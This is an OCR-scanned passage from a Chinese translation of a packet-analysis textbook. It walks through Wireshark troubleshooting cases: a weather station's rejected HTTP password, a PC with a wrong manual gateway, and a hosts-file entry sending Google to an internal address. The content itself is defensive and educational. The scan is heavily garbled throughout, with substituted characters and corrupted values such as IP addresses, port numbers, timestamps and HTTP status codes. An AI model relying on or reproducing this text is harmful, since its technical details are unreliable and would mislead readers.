毒 来 截获 数据 包 。 抓 取 的 数据 包 在 文件 weather_broken.pcapng 中 。 





10.2.2 分 析 


打开 抓 包 文件 后 ， 你 会 看 到 ， 这 又 是 一 个 HITP 通 信 的 问题 。 抓 取 
的 数据 包 限 定 于 Pete 的 本 地 气象 数据 接收 喜 172.16.16.154 与 互联 网 上 一 
个 未 知 的 远程 设备 38.102.136.125 之 间 的 单个 会 话 中 《〈 见 图 10-8) 。 


Time 
1 9.9660606 
2 0.9087018 
3 8.9871098 
4 808.887178 
5 8.176462 
6 8.176567 
7 8.176714 
8 8.262587 
9 8.262656 


Source 

172.16.16.154 
38.192.136.125 
172.16.16.154 
172.16.16.154 
38.192.136.125 
172.16.16.154 
172.16.16.154 
38 .192.136.125 
172.16.16.154 


Destination 
38.162.136.125 
172.16.16.154 
38 .192.136.125 
38.192.136.125 
172.16.16.154 
38 .192.136.125 
38.192.136.125 
172.16.16.154 
38 .192.136.125 


Protocol Length Info 
78 53964 > 88 [SYN] Seq=9 Win=65535 Len=@ MSS=1468 WS=32 TSval=10152386941 TSecr=@ SACK PERM=1 
69 88 > 53984 [SYN, ACK] Seq=8 Ack=1 Win=8198 Len=98 NSS=1359 


54 53964 +» 89 [ACK] Seq=l1 Ack=1 Win=65535 Len=@ 

571 GET /weatherstation/yupdateweatherstation.-php?ID=KGAOAKWI2&PASSIWORD=860606666&tempf=43.9&humidity=36- 
237 HTTP/1.8 296 OK (text/html) 

54 53964 + 88 [ACK] Seq=518 Ack=184 Win=65535 Len=@ 

54 53964 > 88 [FIN, ACK] Seq=518 Ack=184 Win=65535 Len=9 

69 80 > 53984 [FIN, ACK] Seq=184 Ack=519 Win=7673 Len=0@ 

54 53964 > 88 [ACK] Seq=519 Ack=185 Win=65535 Len=@ 





图 10-8 分离 出 的 气象 站 接收 费 通 信 


在 检查 这 个 会 话 的 数据 之 前 ， 让 我 们 先 来 识别 这 个 未 知 I[P。 如 果 不 
进行 进一步 研究 ， 我 们 将 无 法 判断 这 个 IP 是 否 是 Pete 的 气象 站 应 该 访问 
的 地 址 ， 但 是 我 们 至 少 能 够 通过 WHOIS 查 询 来 确定 此 IP 是 否 是 
Wunderground 服 务 需 的 一 部 分 。 你 可 以 在 大 多 数 域名 注册 网 站 或 区 域 互 
联网 注册 管理 网 站 完成 WHOIS 查 询 。 根 据 查 询 结 果 ， 这 个 IP 看 起 来 属于 


一 家 名 为 Cogent 的 互联 网 服务 供应 商 (ISP) 


( 见 图 10-9) 。 结 果 中 也 提 


到 了 PSINet 公 司 ， 但 是 搜索 显示 ，21 世 纪 初 Cogent 获 得 了 PSINet 的 大 部 


分 设备 。 


Net Range 

CIDR 

Name 

Handle 

Parent 

Net Type 

Origin AS 
Dorganization 
Registration Date 
Last Updated 


38000- 38.255.255.255 
238.0008 
COGENT-A 


NET-38- 人 OO-1 


Direct Allocation 


AS174 


1991-04-16 


2011-05-20 


Comments Reassignment information for this block can be found tt 
rmihois.cogentco.com 4321 


RESTfuI Link 


号 BE Also 


See BISo 





图 10-9 WHOIS 数 据 识 别 出 此 IP 的 拥有 者 


在 某 些 情况 下 ， 如 果 IP 地 址 由 一 个 组 织 或 企业 直接 注册 ， 那 么 
WHOIS 碍 询 会 返回 组 织 名 称 。 然 而 ， 多 数 情 况 下 ， 公 司 不 会 目 己 去 直 
接 申 请 站， 而 是 从 因特网 服务 提供 商 〈ISP) 的 卫 字 中 获取 地 址 。 在 这 
种 情况 下 ， 男 一 种 有 效 的 措施 是 查找 与 IP 地 址 相关 联 的 自主 系统 编号 


(ASN) 。 组 织 需 要 申请 一 个 ASN 用 于 在 公 网 中 文 持 攻 些 路 由 方式 。 有 
很 多 方法 可 用 于 查找 IP-ASN 关 联 关 系 〈( 一 些 WHOIS 介 询 工 具 会 目 动人 查 
找 IP-ASN 关 联 ) ， 我 推荐 使 用 Cymru 团 队 自 动 查询 工具 。 使 用 这 个 工具 
查询 38.102.136.125， 我 们 看 到 它 与 AS 36347 相 关联 ， 此 ASN 属 
于 “WUNDERGROUND - THE WEATHER CHANNEL, LLC, US”( 见 图 
10-10) 。 这 表明 ， 至 少 ， 与 气象 站 进行 通信 的 设备 属于 期 望 中 的 组 
织 。 如 果 碍 询 结 果 返 回 的 组 织 信息 与 期 望 值 不 符 ， 则 说 明 Pete 的 接收 需 
通信 对 象 设 备 可 能 有 误 ， 但 是 在 本 例 中 并 没有 出 现 这 种 情况 。 


Executing commands. Please be patient! 
v4.whois.cymru.com 
e server returned #4 linets). 
LS.Eymrmuoconm] 
] 
| a5 N 





BS | IF £5 Name 
3 石 3 本 7 | 38.182.1356.125 | WUNDERGROUND - THE WEATHER CHANNEL, LLC,US 


图 10-10 ”对 这 个 外 网 IP 地 址 进行 IP-ASN 关 联 查 询 


确认 了 这 个 未 知 主 机 的 所 属 组 织 信息 后 ， 我 们 将 深入 探讨 通信 的 细 
节 。 这 个 会 话 相 对 较 短 : 由 一 个 TCP 握 手 过 程 、 一 次 HTTP GET 请 求 及 
响应 和 一 个 TCP 断 开 过 程 组 成 。TCP 握 手 和 断 开 似乎 成 功 了 ， 所 以 问题 
人 我 们 跟踪 HTTP 请 求 的 TCP 流 进行 细致 查看 
( 见 几 10-11) 。 


在 HITP 通 信 过 程 中 ， 首 先 由 Pete 的 接收 费 回 WunderGround 发 进 一 
个 GET 请 求 。HTTP 内 容 部 分 没有 数据 ， 大 量 的 数据 通过 URL 进 行 传输 
@。 对 于 Web 应 用 ， 通 过 URL 查 询 字 人 符 串 传 输 数 据 是 很 常见 的 ， 看 起 
来 ， 接 收 右 使 用 这 种 机 制 更 新 天 气 信息 。 例 如 ， 你 可 以 看 
到 tempf=43.6、dewptf=13.6 和 windch1L1f=43.6 这 样 的 字段 。 
WunderGround 信 息 收 集 服务 需 解 析 UREL 中 的 一 些 字 段 和 参数 ， 并 将 它 
们 存储 在 数据 库 中 。 


翅 Wireshark . Follow TCP Stream (tep.stream eq 0) .weather broken 





GET /weatherstation/updateweather php 

ID= er 80806000008&tem Ee -43。 .08hun ity=36&dew vie 3 6&windchillf=43.0&winddir=1948windspee oh 
a =2.46&rainin=@.08&daily = 人 .80808&weeklyr n=8.808&month] 8.00&yearl 
=54. a. B&indoortempf=67.1&indoo idi ye lt in=29.328&lowbatt=8&dateutc=2016-1- 了 

1:58:34&s retype=Weather%28logger%28V1.6&action=updateraw&realtime=1&rtfreq=5 HTTP/1.1 人 © 

Host: 38-162.136.125 

User-Agent: curl/7.43.98 

Pe cept: 入 


HTTP/1.8 268 ok 
Content-type: text/html 


Date: Thu, 87 Jan 2816 88:28:39 GMT 
Content-Length: 58 
Connection: keep-aliv 


INVALIDPASSWORDID|Password or key and/or id are incorrect © 


WA 





1 chiert philfsl. I server Phils 1 tewn, 
Entire conversation (700 bytes) 于 Show data as |ASCII Y Stream 
Find: Find Next 


Hide this stream Fin aVE a5... | Close Help 








图 10-11 跟踪 接收 颖 通信 的 TCP 流 


根据 第 一 印象 ， 这 个 发 往 WunderGround 服 务 帮办 GET 请 求 似乎 没有 
任何 问题 ， 但 是 对 应 的 响应 显示 有 一 个 错误 。 服 务 右 的 啊 应 状态 码 
为 HTTP/1.6 266 OK 人， 表明 GET 请 求 被 成 功 接收 ， 但 是 啊 应 的 消息 体 
包含 了 一 条 有 用 的 信息 ，INVALIDPASSNORD|Password or key 
add/or id are incorrect®©@., 


回 到 请 求 URL 部 分 ， 你 会 发 现 查 询 字 符 串 的 前 两 个 参数 为 ID 和 
PASSNWORD。 和 气象 站 使 用 这 种 方式 完成 在 WunderGround 服 务 器 上 的 登录 
和 验证 。 


本 例 中 ，Pete 的 气象 站 ID 正 确 ， 但 是 窜 码 错误 。 由 于 某 些 未 知 原 
因 ， 密 三 被 置 为 0(。 由 于 已 知 的 最 后 一 次 通信 成 功 发 生 在 午夜 ， 因 此 可 
能 是 一 次 升级 或 接收 器 重启 ， 导 致密 码 设置 丢失 。 


EE 


由 于 很 多 开发 者 选择 使 用 URL 传 递 参 数 ， 因 此 我 们 建议 一 般 情况 下 不 要 如 本 例 所 示 ， 将 
密码 写 在 URL 参 数 中 。 因 为 在 不 使 用 加 窒 措 施 ， 如 HTTPS， 的 情况 下 ，HTTP 通 信 将 使 用 明 
be hl 通信 链 路 的 恶意 用 户 
能 够 规 获 你 的 密码 。 





此 刻 ，Pete 接 入 他 的 接收 器 ， 输 入 新 的 密码 。 稍 后 ， 他 的 气象 站 重 
新 开始 同步 数据 。 一 个 成 功 的 气象 站 通 甬 信 数据 在 weather_working.pcapng 
中 。 通 信 流 如 图 10-12 所 示 。 


Wireshark . Follow TCP Stream (tcp.stream eq 0) .Weather workin 
Cp.s eq 9 





GET /weatherstation/updateweatherstation.php? 
ID= KGAOAKWO2&PASSWORD= 12345678&tem i =43, 8B&hum idity= ee SR 13。 6&windchiljf=43.B&winddir=1948&winds spee edmph 
BB&we inin= i i 


=8.22&windgustm SE 46&ra ee rainin= = - yearly 
&solarradiation=54. 14&UV- BG&indoortempf=67.1&indoorhum 3 ity= 268ber =29 .32&lowbatt=8&dateutc=2616-1- 6%262 


1:58: 348s oftma retype=Weathe r%261o ogger%26V1.69&action=updateraw&re ot e=1&rtfreq=5 HTTP/1.6.8 
Accept 

Host: 3. 162.136.125 
Co Clos 


HTTP/1.9 288 OK 
Content-type: text/html 
pe 86 Jan 2816 21:58:35 GMT 
ength: E 





1 chiert pkutls) 1 server PtSL I tm, 
Entire conversation (621 bytes) ~ Show data as |ASCII Stream 


Find: | [| Find Next 


Hide this stream rin ve as... ose Help 














图 10-12 成 功 的 气象 站 通信 


现在 ， 密 码 正 确 QQOQ，WunderGround 服 务 器 在 应 答 的 HTTP 啊 应 体 中 
返回 了 一 条 success 消 息 @， 


10.2.3 ”学 到 的 知识 


在 这 个 场景 中 ， 一 个 第 三 方 服 务 使 用 为 一 个 协议 (HTTP) 的 特性 
完成 网 络 访问 。 你 :会 经 党 需要 修复 第 三 方 服务 的 网 络 问 昕 ， 当 没有 相应 
的 文档 或 错误 日 忘 时 ， 数 据 包 分 析 拉 术 非 第 适合 用 于 对 这 些 服 务 进行 故 
障 处 理 。 现在 物 联网 (IoT) 设备 ， 如 这 个 气象 站 ， 在 生活 中 的 应 用 越 
来 越 多 ， 本 节 中 的 情况 将 越 来 越 普 过 。 


解雇 这 样 的 问题 ， 需 要 有 了 能力 检 栓 未 知 的 传输 序列 ， 推 上 地 出 通信 过 
程 可 能 的 工作 方式 。 某 些 应 用 ， 如 本 例 中 基于 HTTP 的 气象 数据 传输 ， 
相当 人 简单。 一 些 其 他 的 应 用 非常 复杂 ， 包 括 多 种 传输 方式 、 数 据 加 密 ， 
甚至 是 Wireshark 原 生 组 件 无 法 解析 的 定制 化 协议 。 


旺 看 对 更 多 的 第 三 方 服务 的 研究 ， 你 会 逐渐 了 解 开 及 者 用 于 实现 网 
络 通 信 的 篆 见 模式 。 这 样 的 知识 会 提高 你 对 这 些 服务 进行 故 隐 处 理 时 的 


效率 ， 
10.3 ”无 法 访问 Internet 


在 许多 情况 下 ， 你 可 要 诊断 和 解决 Internet 的 连接 问题 ， 下 面 我 


们 将 介绍 一 些 你 可 能 遇 到 的 常见 问题 。 
10.3.1 网 天 配置 问题 


第 一 个 问题 的 场景 相当 简单 : 用 户 不 能 访问 Intemet。 我 们 已 经 确认 
该 用 尸 可 以 访问 所 有 内 网 资源 ， 包 括 其 他 工作 站 的 共 圣 内 容 以 及 运行 在 
本 地 服务 磺 上 的 应 用 程序 。 


这 个 网 络 架 构 非 党 简单 ， 因 为 所 有 客户 机 和 服务 噩 都 连接 到 一 系列 
的 简单 交换 机 上 。TInternet 连 接 由 一 个 路 由 需 〈 作 为 默认 网 关 ) 人 处理，IP 
地 址 信息 由 DHCP 服 务 提供 。 这 种 情景 在 小 型 办 公 宣 中 非 稼 各 见 。 


1. 侦 听 线路 


为 了 找 出 问题 的 原因 ， 我 们 可 以 一 边 用 咒 探 器 监听 线路 ， 一 边 让 用 
户 尝试 浏 览 Pnternet。 我 们 使 用 2.5 节 中 的 信息 〈 见 图 2-15) ， 来 决定 放置 
咒 探 器 的 方法 。 


网 络 上 的 交换 机 不 支持 端口 镜像 。 为 了 完成 测试 ， 我 们 已 经 不 可 中 
免 地 妨碍 了 用 户 ， 所 以 我 们 假设 可 以 使 他 再 次 下 线 〈 这 是 说 ， 使 用 网 络 
分 流 器 是 监听 线路 的 推荐 办 法 ) 。 最 后 得 到 捕获 记录 文件 


nowebaccessl.pcap。 
2. 分 本 


如 图 10-13 所 示 ， 流 量 捕 获 记 录 文 件 以 一 个 ARP 请 求 和 啊 应 开始 。 
用 户 计算 机 的 MAC 地 址 是 00:05:b3:bf:91:ee，IP 地 址 是 172.16.0.8。 在 数 
据 包 1 中 ， 用 户 的 计算 机 发 送 一 个 ARP 广 播 数 据 包 给 网 络 上 的 所 有 计算 
机 ， 试 图 得 到 默认 网 关 172.16.0.10 的 MAC 地 址 。 


No,. Time Source Destination Protocol Length Info 


4 94:32:21.445645 090°25:b3:bf:91ees tttaffetfertf:4fARP 42 Who has 172.16.6.16? Tell] 172.16.0.8 
2 804:32:21.445735 96:24:81:al:f6:79 6896:25:b3:bf:91:ee ARP 696172.16.90.196 is at 6866:24:81:al:f6:79 





图 10-13 ”针对 计算 机 默认 网 关 的 ARP 请 求 和 啊 应 


根据 数据 包 2 中 收 到 的 啊 应 ， 用 户 的 计算 机 了 解 到 172.16.0.10 的 
MAC 地 址 是 00:24:81:al:f6:79。 收 到 这 个 啊 应 后 ， 计 算 机 束 有 了 到 达 网 
天 的 路 由 ， 而 网 天 应 该 可 以 带 它 接 入 Internet。 


ARP 啊 应 之 后 ， 计 算 机 会 在 数据 包 3 中 请 求 将 网 站 的 域名 解析 成 IP 


地 址 。 如 图 10-14 所 示 ， 计 算 机 发 送 一 个 DNS 查 询 数 据 包 到 它 的 皮 选 
DNS 服 务 器 4.2.2.2@， 


翅 Wireshark , packet 3. nowebaccess1 





Frame 3: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 


Ethernet II, Src: HewlettP bf:91:ee (66:25:b3:bf:91:ee), Dst: HewlettP al:f6:79 (99:24:81:al:f6:79) 
Internet Protocol Version 4, Src 


=: 172.16.0.8, Dst: 4.2.2.2 
User Datagram Protocol, Src Port: 55878 (558760), Dst Port: S53 (53) 
Y Domain Name 

Transaction - 

Flags: 80x8188 Standard query 

Questions: 1 

Answer RRs: @ 

Authority RRs: 9 

Additional RRs: 人 

Y Queries 





.Com: type A, class IN 








No.: 3 ' Time: 0.000105 ' Sourcer 172,16,0.8 * Destination’ 4.2.2.2 * 月 Pipe DNS * Length: 74 " Infor Standsrd ENSO A 内 HoooEcmm 


图 10-14 ”发 送 到 4.2.2.2 的 DNS 查询 
正常 情况 下 ，DNS 服 务 右 会 迅速 啊 应 DNS 查 询 ， 但 在 这 个 例子 中 并 


非 如 此 。 我 们 没有 看 到 任何 啊 应 ， 却 及 现 同 样 的 DNS 得 询 册 次 及 达到 不 


同 的 目的 地 址 。 如 图 10-15 所 示 ， 在 数据 包 4 中 ， 第 二 个 DNS 查询 被 发 送 
到 预先 配置 好 的 备用 DNS 服务 器 4.2.2.1 和 @@。 


帮 Wireshark . Packet4, nowebaccess1 





Frame 4: 74 bytes on wire (592 bits), 74 bytes captured (592 bits ) 
Ethernet II, Src: 


HewlettPp bf:91:ee (806:25:b3:bf:91:ee), Dst: HewlettP al:f6:79 (86:24:81:al:f6:79) 
Internet Protocol Version 4, Src: 172.16.6.8, Dst: 4.2.2.1O0 


User Datagram Protocol, src Port: S55878 (55879)，Dst Port: S53 (S53) 
YY Domain Name System (query) 


Transaction ID: @x868@d1 
Flags: 8x8188 Standard query 
Questions: 1 

Answer RRs: 8 


Authority RRs: 8 
Additional RRs: 8 











图 10-15 “发 送 到 4.2.2.1 的 第 二 个 DNS 查询 


由 于 计算 机 仍然 没有 从 DNS 服务 器 收 到 啊 应 ， 因 此 1s 后 ， 碍 询 被 再 
次 发 送 到 4.2.2.2。 如 图 10-16 所 示 ， 这 个 过 程 不 断 重 复 ， 在 接 下 来 的 几 秒 
钟 ， 计 算 机 交替 向 配置 好 的 首选 DNS 服务 器 加 和 备用 DNS 服务 器 和 发 送 


请 求 。 整 个 过 程 大 概 伦 了 8s 售 ， 这 正 是 用 户 的 Internet 浏 览 器 报告 该 页 
无 法 访问 之 前 所 花 的 时 间 。 


Protocol Length Info 


1 8.000080 Hewlettp bf d ARP 42 Who has 172.16.8.18? Tell 172.16.8.8 

2 08.000090 ewle 2.16.8.10 is at 066:24:81:al:f6:79 

3 .808080185 .16.0. 4.2.2.2 种 andard query Bx86d1 A www.google.com 

4 .9992808 172.16.9. 32.21 4 Standard gquery @x88d1 A www.google.com 

5 1.999279 .16.08. 4.2.2.2 1 tandard query Gx868d1 A www.EOoE1Le.com 

6 3.999372 .16.9. 4.2.2.1 办 andard query @x86d1 A www .ECOoE1Le.com 

7 了 .999393 72.16.9. 4.2.2.2 f 4 Standard query @x88d1 A www.google.com 

8 7.999627 Al N 74 Standard query Bx88d1 A www.google.com 
172.16.8.8 ,22.2.2 ; andard query 8x88d1 A wvw.google.com 








图 10-16 ”直到 通 信 结 束 ， 重 复 的 DNS 查 询 才 停止 


基于 前 面 看 到 的 数据 包 ， 我 们 可 以 开始 得 明 问题 的 根 状 了 。 首 先 ， 
我 们 看 见 一 个 ARP 请 求 成 功 地 抵达 网 络 上 我 们 认为 的 默认 网 关 ， 由 此 我 
们 知道 网 关 设 备 在 线 并 且 能 连接 。 我 们 也 知道 用 户 的 计算 机 确实 在 网 络 
上 传输 数据 包 ， 所 以 我 们 可 以 假设 本 机 的 协议 栈 没 有 问题 。 显 然 当 进行 
DNS 请 求 时 ， 问 题 束 发 生 了 。 


就 这 个 网 络 来 襄 ，DNS 请 求 是 由 Internet 上 的 外 部 服务 器 (4.2.2.2 或 
4.2.2.1) 解析 的 。 这 意味 者， 要 使 解析 顺利 进行 的 话 ， 负 责 将 数据 包 路 
由 到 Internet 的 路 由 器 必须 成 功 将 DNS 查询 转发 到 服务 器 ， 而 且 服 务 器 必 
须 啊 应 。 人 否则 ， 恕 无 法 用 HTTP 请 求 Web 页 面 。 


我 们 知道 其 他 用 户 上 网 都 没有 问题 ， 这 说 明 网 络 路 由 器 和 远程 DNS 
限 务 吕 也 许 不 是 问题 的 原因 所 在 。 剩 下 唯一 可 能 的 问题 来 源 是 用 户 自己 
9 计算 机 。 


进一步 检查 这 台 故 障 计 算 机 后 ， 我 们 发 现 它 不 接受 DHCP 分 配 的 地 
址 ， 而 是 手动 配置 了 地 址 信息 ， 并 且 默 认 网 关 地 址 设置 错 了 。 被 设置 为 
os 它 不 能 将 DNS 查询 数据 包 转 发 到 网 
络 之 外 。 


3.， 学 a 到 的 知识 


在 这 个 情景 中 ， 问 题 出 目 一 人 台 配 置 错误 的 各 户 病 。 虽 然 这 个 问题 相 
当 简 单 ， 但 它 却 严 重 影响 了 用 户 。 对 于 缺少 网 络 知识 或 者 不 能 像 我们 这 
样 可 以 快速 分 析 数 据 包 的 人 而 言 ， 排 除 这 么 简单 的 配置 错误 将 从 这 相当 
多 的 时 间 。 你 可 以 看 到 ， 数 据 包 分 析 并 不 局 限于 大 型 和 复杂 的 问题 。 


注意 ， 由 于 我 们 不 知道 网 络 上 默认 网 关 的 卫 地 址 ， 因 此 Wireshark 不 
能 准确 地 识别 问题 ， 但 它 可 以 告诉 我 们 去 哪里 找 ， 从 而 节省 了 宇 贵 时 
间 。 如 果 我 们 先 与 I SP 联系 或 者 尝试 用 其 他 手段 排除 远程 DNS 服 务 器 的 
央 系 ， 而 不 是 检查 网 天 路 由 如 ， 那 么 我 们 就 能 将 注意 力 集 中 到 计算 机 本 
和 掉 、 实 际 也 束 古 问题 的 原因 上 。 


EB 


如 果 我 们 能 更 熟悉 这 个 特定 网 络 的 IP 地 址 分 配方 琳 ， 就 可 以 更 快 地 分 析出 结果 。 如 果 我 
们 注意 到 ARP 请 求 被 及 送 到 与 网 天 路 由 静 不 同 的 卫 地 址 上， 如 能 立刻 知道 问题 所 在 。 网 络 出 
现 问 题 经 各 是 由 这 些 简 单 的 配置 错误 造成 的 ， 通 过 分 析 少 量 的 数据 包 ， 通 稼 都 能 快速 解决 。 





10.3.2 ”意外 重 定 同 


在 这 个 情景 中 ， 我 们 又 过 到 一 位 不 能 在 工作 站 上 网 的 用 户 。 然 而 ， 
不 像 之 前 那个 用 户 ， 她 可 以 访问 Internet， 只 是 不 能 访问 Google 主 页 。 
次 她 想 访问 Google 的 网 站 时 ， 都 被 重 定 同 到 一 个 浏览 右 页 面 * 该 页 无 法 
显示 ”。 这 个 问题 只 影响 她 一 个 人 。 

与 之 前 的 情景 一 样 ， 这 是 一 个 只 有 一 些 简单 交换机 和 一 个 简单 路 由 
人 锅 网 天 的 小 型 网 络 。 


1. 侦 听 线路 


nowebaccess2.pcap 文 件 。 


2. 分 析 


如 图 10-17 所 示 ， 捕 获 记 录 文 件 以 一 个 ARP 请 求 和 啊 应 开始 。 在 数 
据 包 1 中 ， 用 户 计算 机 的 MAC 地 址 是 00:25:b3:bf:91:ee，IP 地 址 是 
172.16.0.8， 它 回 网 段 上 的 所 有 计算 机 发 送 一 个 ARP 广 播 数 据 包 ， 试 图 获 
得 主机 172.16.0.102 的 MAC 地 址 。 我 们 目前 还 不 认识 这 个 地 址 。 





图 10-17 ”对 网 络 上 男 一 个 设备 的 ARP 请 求 和 啊 应 


在 数据 包 2 中 ， 用 户 的 计算 机 了 解 到 IP 地 址 172.16.0.102 的 MAC 地 址 
是 00:21:70:c0:56:f0。 根 据 之 前 的 情形 ， heed pe i 哈欠 地 
址 ， 通 过 这 个 地 址 数据 包 可 以 被 再 次 转发 到 外 部 DNS 服务 磺 。 然 而 ， 如 
图 10-18 所 示 ， 下 一 个 数据 包 并 不 是 DNS 请 求 ， 而 是 从 172.16.0.8 到 | 
172.16.0.102 的 TCP 数 据 包 。 它 设置 了 『 了 SYN 标志， 表明 这 是 两 台 主 机 间 建 
六 TCP 连接 时 握手 的 第 一 个 数据 包 @@。 


硬 Wireshark .Packet 3. nowebaccess2 


» Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
”Ethernet II, Src: Hew]ettP bf:91:ee (86:25:b3:bf:91:ee), Dst: Del] c8:56:18 (68:21:78:c8:56:f6) 
;Internet Protocol Version 4, Src: 172.16.8.8, Dst: 172.16.8.192 © 
Y Transmission Control Protocol, Src Port: 1674 (1874), Dst Port: 88 (88), Seq: 8; Len: @ 
Source Port: 1874 
Destination Port: 88 © 
[Stream index: @] 
[TCP Segment Len: 8] 
Sequence number: 纯 (relative sequence number 


Acknowledgment number: 9 

Header Length: 32 bytes 
es 6x882 (SYN) © 

Wi M size value: 8192 


lated window size: 8192] 
" Checksum: Bx58b5 [validation disabled] 
Urgent pointer: 9 
Options: (12 bytes), Maximum segment size, No-Operation (NOP), Window scale, No-Operation (. 











No.: 3 ° Time: O000349 * Source: 172,16.0.8 * Destination: 172,16.0.102 * Pro..gth: 6 ' Infor 1074 — BOISYN) Seq=0 Win=8192 Len=0 N95=—14650 WS=4 SACK PE 





图 10-18 ”从 一 台 内 网 主机 发 往 男 一 台 内 网 主机 的 TCP SYN 数 据 包 


然 ， 试 图 连接 到 172.16.0.102 全 的 80 新 口 信 的 TCP 连 接 通 沿 与 
ee 关 。 如 图 10-19 所 示 ， 当 主机 172.16.0.102 发 送 回 带 有 RST 和 
ACK 标 志 @@ 的 TCP 数 据 包 (数据 包 4) 时 ， 连 接 请 求 束 中 靳 了 。 


二 Wireshark .Packet 4 , nowebaccess2 


Frame 4: 68 bytes on wire (488 bits), 68 bytes captured (488 bits) 
Ethernet II, Src: Dell c@:56:f80 (80:21:70:c0:56:f80), Dst: HewlettP bf:91:ee (600:25:b3:bf:91:ee) 


Internet Protocol Version 4, Src: 172.16.8.182, Dst: 172.16.¢8.8 
YY Transmission Control Protocol, Src Port: 89 (36), Dst Port: 1974 (1674), Seq: 1, Ack: 1, Len: 人 
Source Port: 88 
Destination Port: 
[Stream index: 


Sequence mumber: 1 Wr relative i number ) 
Acknowledgment number: 1 (relative ack number) 
Header Length: 28 nh 

; Flags: 8x814 (RST, ACK) @O 
Window size value: 8 
[Calculated window size: 
[Window size scaline facto 1 (unknown)] 
Checksum: Bxcaaa [validati isabled]| 
Urgent pointer: 9 
[SEQ/ACK analysis] 





No,: 4 * Time: 0.000510 ' Sourcer 172,16.0.102 " Destination: 172,16.0.8 " Protocol: TCP Lengthr 60 " Inio: B80 — i1074 IRST,. ACK) Seq=1 Ack=I Win=0 len=0 





图 10-19 ”响应 TCP SYN 的 TCP RST 数 据 包 


第 6 章 介 绍 过 ， 市 有 RST 标 志 的 数据 包 征 用 来 吉 束 TCP 连 接 的 。 在 这 
个 场景 中 ， 主 机 172.16.0.8 和 尝试 与 主机 172.16.0.102 的 80 端 口 建 六 TCP 连 
接 。 不 笠 的 是 ， 由 于 那 台 主机 没有 配置 好 服务 在 80 端 口 的 监听 请 求 ， 因 
此 只 能 发 送 TCP RST 数 握 包 结束 连接 。 这 个 过 程 又 重复 了 两 次 。 如 图 
10-20 所 示 ， 在 通信 最 终结 束 前 ， 用 户 计算 机 发 送 了 一 个 SYN 数 据 包 并 
得 到 RST 响 应 。 


3 8.808349 172. I .8 172.16. 0. 192 Tep 66 1974 3 808 TS Seq=8 Win=8192 Len=8 MSS=1463 WS=4 SACK_PERM=1 
4 人 台 .O00519 1I72.16.9.192 172.16.8.8 69 Se 1974 机 Se =1 Ack=1 Win=9 Len=9 
82 TCP CP 


Re on] 1 36 Ee Seq=8 Win=8192 Len=@ MSS=1468 WS=4 SACK PERM=1 


EEL Yd 172.16.8.1082 172.16.8.8 69 89 他 1674 sr Acq s 二 二 =1 Ac 1 Win=9 Len=@ 


2 CP 8 [SYN] Seq=8 Win=8192 Len=@ MSS=1468 SACK PERM=1 
EEEEL TY 172.16.9.8 66 89 > 1974 ee ES Seq=1 Ac 1 Win=9 Len=g 





图 10-20 TCP SYN 和 RST 数 据 包 一 共 出 现 了 3 次 
此 时 ， 用 户 在 浏览 器 上 看 到 了 了“ 访 页 无 法 显示 ?”。 


在 得 看 其 他 工作 正 第 的 网 络 设备 的 配置 信息 后 ， 数 据 包 1 和 2 中 的 
ARP 请 求 和 啊 应 引起 了 我 们 的 注意 。 因 为 ARP 请 求 并 不 是 指 问 网 天 路 由 
妖 的 真实 MAC 地 址 ， 而 套 其 他 术 知 设备 。 人 在 ARP 请 求 和 啊 应 之 后 ， 我 
们 期 望 看 到 同 DNS 服 务 器 的 请 求 ， 以 得 到 Google 的 了 地 址 ， 但 最 终 并 设 
有 看 到 。 阻 止 DNS 查询 的 两 个 条 件 如 下 。 


。 及 起 连接 的 设备 在 DNS 缓存 中 已 丝 有 域名 一 下 地 址 的 对 应 项 。 
。 友 起 连接 有 的 设备 在 hosts 文 件 中 已 经 有 域名 一 IP 地 址 的 对 应 项 。 


进一步 检查 这 合计 算 机 后 ， 我 们 发 现 它 的 hosts 文 件 有 一 个 Google 表 
项 ， 对 应 一 个 内 网 IP 地 址 172.16.0.102。 这 个 错误 表 项 就 是 用 户 问 题 的 根 


计算 机 通 第 都 把 hosts 文 件 当 作 域 名 一 IP 地 址 配对 的 可 信 来 源 ， 并 且 
会 在 查询 外 部 来 源 之 前 检索 它 。 在 这 个 场景 中 ， 用 户 计 算 机 检查 它 的 
hosts 文 件 ， 发 现 有 一 个 Google 的 表 项 ， 束 认为 Google 在 这 个 本 地 网 段 。 
接着 ， 它 同 这 个 主机 发 送 ARP 请 求 ， 并 得 到 啊 应 ， 然 后 笠 试 同 
172.16.0.102 的 80 端 口 发 起 TCP 连 接 。 然 而 ， 由 于 该 系统 并 没有 配置 成 
Web 服 务 需 ， 因 此 它 不 可 能 接受 这 个 连接 请 求 。 


将 这 个 hosts 文 件 的 表 项 移 除 后 ， 用 户 的 计算 机 束 能 正 第 访问 Google 


在 Windows 系 统 上 但 看 hosts 文 件 ， 请 打开 C:\Windows\System32\drivers\hosts。 


在 Linux 上 则 应 查看 /etc/hosts。 





实际 上 ， 这 个 场景 非常 普 裔 。 恶 意 软 件 在 几 年 前 就 使 用 这 个 方法 ， 
把 用 户 重 定 回 到 存放 恶意 代码 的 网 站 。 试 媳 ， 如 要 黑客 修改 了 你 的 hosts 
文件 ， 每 次 你 登录 网 上 银行 ， 实 际 上 访问 的 却 是 一 个 仿造 的 网 站 ， 专 门 
偷 你 账户 里 的 钱 ， 这 该 有 多 恕 怖 ! 


3. 学 到 的 知识 


继续 分 析 流 量 ， 你 会 了 解 各 种 各 样 的 协议 如 何 工作 以 及 如 何 阻 断 它 
们 。 在 这 个 场景 中 ， 主 机 没有 友 送 DNS 请 求 是 因为 客户 闹 倍 错误 配置 
了 ， 而 不 是 因为 其 他 外 部 限制 或 外 部 的 错误 配置 。 

在 数据 包 层 面 上 考查 这 个 问题 ， 我 们 可 以 迅速 及 现 未 知 的 耳 地址 ， 
也 能 迅速 及 现 DNS 这 个 通信 过 程 的 关键 部 分 消失 了 。 通 过 这 些 信息 ， 我 
们 可 以 指出 客户 器 才 是 问题 的 来 源 。 


- 


10.3.3” 上游 问题 


与 前 两 个 场景 一 样 ， 在 这 个 场景 中 ， 有 一 位 用 户 抱 候 它 的 工作 站 无 
法 上 网 。 后 来 ， 他 发 现 只 是 无 法 访问 Google 这 个 网 站 。 进 一 步调 查 之 
后 ， 我 们 友 现 这 个 问题 影响 到 了 机 构 的 每 一 个 人 一 一 谁 也 无 法 访问 
Google。 


这 个 网 络 的 配置 和 前 两 个 场景 一 样 ， 仍 然 是 用 一 些 简单 交换 机 和 一 
